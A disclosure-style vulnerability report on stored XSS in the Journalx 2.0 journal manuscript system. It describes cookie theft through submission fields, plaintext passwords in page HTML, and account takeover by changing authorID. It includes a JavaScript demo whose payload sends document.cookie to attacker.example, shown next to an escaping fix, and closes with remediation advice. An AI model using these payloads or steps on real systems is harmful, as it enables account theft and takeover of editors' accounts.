Journalx 2.0 stored XSS
Journalx 2.0 is an online manuscript-handling system for academic journals, developed independently by Beijing Magtek, and is a leading new-generation remote manuscript-processing platform in China.
#1 Stealing the cookie
Register an author account, open the author workbench, and choose "contribute" to submit a manuscript.
Put the XSS PoC in the title (topic) field of the submission.
When the manuscript is opened in review management, the stored XSS fires and the reviewer's cookie is sent to the attacker.
The title field is not the only injection point: the author's name, the keywords, the abstract, and the body all suffer from stored XSS, and each is exploited in exactly the same way as the title.
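The following is an added example, not code from the Journalx product or from this report. It shows why every manuscript field is an injection point: a vulnerable renderer concatenates the submitted fields straight into the review page, so a payload in the title becomes live markup, while the hardened renderer HTML-escapes each field first. The manuscript object, the field names, the cookie-stealing payload and the crude active-markup check are all constructed for this demo; the real Journalx field names and review page are not known from the report.

```javascript
// Added example (not Journalx code). Demonstrates stored XSS through manuscript fields
// and output encoding as the fix. All names and the payload below are constructed.

// Constructed payload of the kind used for cookie theft: an <img> whose error handler
// ships document.cookie to an attacker-controlled host (hypothetical domain).
const ATTACKER_PAYLOAD =
  '<img src=x onerror="new Image().src=\'http://attacker.example/c?\'+document.cookie">';

// Constructed manuscript as an author could submit it: every field is attacker-controlled.
const manuscript = {
  title: 'On Stored XSS ' + ATTACKER_PAYLOAD,
  author: 'A. Author',
  keywords: 'xss, review',
  abstract: 'Harmless abstract',
  body: 'Harmless body',
};

// Vulnerable renderer: fields are interpolated unchanged, so submitted markup is parsed
// as HTML when the reviewer opens the page.
function renderVulnerable(m) {
  return `<h1>${m.title}</h1>
<p class="author">${m.author}</p>
<p class="keywords">${m.keywords}</p>
<p class="abstract">${m.abstract}</p>
<div class="body">${m.body}</div>`;
}

// Hardened renderer: escape the five characters that can change HTML context before
// interpolating. Apply it to every field, not only the title.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderHardened(m) {
  return `<h1>${escapeHtml(m.title)}</h1>
<p class="author">${escapeHtml(m.author)}</p>
<p class="keywords">${escapeHtml(m.keywords)}</p>
<p class="abstract">${escapeHtml(m.abstract)}</p>
<div class="body">${escapeHtml(m.body)}</div>`;
}

// Crude check used only by this demo: does the rendered page still contain a <script>
// tag or a tag carrying an on* event handler? Not a general XSS oracle.
function containsActiveMarkup(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}

console.log('vulnerable page carries active markup:', containsActiveMarkup(renderVulnerable(manuscript)));
console.log('hardened page carries active markup:  ', containsActiveMarkup(renderHardened(manuscript)));
```

The same `escapeHtml` call must wrap the author name, keywords, abstract and body, since the report shows each of them is stored and rendered the same way as the title.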
#2 Obtaining the administrator's password
Opening the personal information modification page gave us our first shock. How can the vendor be this cavalier?
The password is kept in plain text in the web front-end: the user's current password is written into the page's HTML. A stored XSS payload only has to run a few lines of JS that read the value out of that element, and the administrator's password is in hand.
That was only the first shock. The second came when I glanced at the URL in the address bar.
After I changed the authorID in the URL, my friends and I were shocked again.
The page acts directly on other users' accounts, including showing their password. (The administrator of this site is not the admin account, by the way; it is logged in as an ordinary author... but that is beside the point.)
The same applies beyond the password to the personal information itself: change the authorID and you can edit any other user's details directly.
My friends and I were shocked once more. Here the stored XSS only needs to do the simplest thing, grab the page location; once the authorID is known you can escalate and operate on, take over, and modify anything that belongs to the administrator.
A cruder approach, of course, is simply to fuzz the authorID.
#3 Resetting the administrator's password
As in #2, the stored XSS is used to load external JS, which sends the request directly and resets the user's password from within the current domain.
Security is a whole. Do not underestimate stored XSS.
Solution:
1. Filter and escape every user-supplied field (title, author name, keywords, abstract, body) on output, so submitted markup is rendered as text rather than HTML.
2. Authorize every request against the logged-in session (the cookie), not against the authorID parameter, and never write the stored password into the page.
3. Control which domains the pages may load scripts from, so an injected script cannot pull in external JS.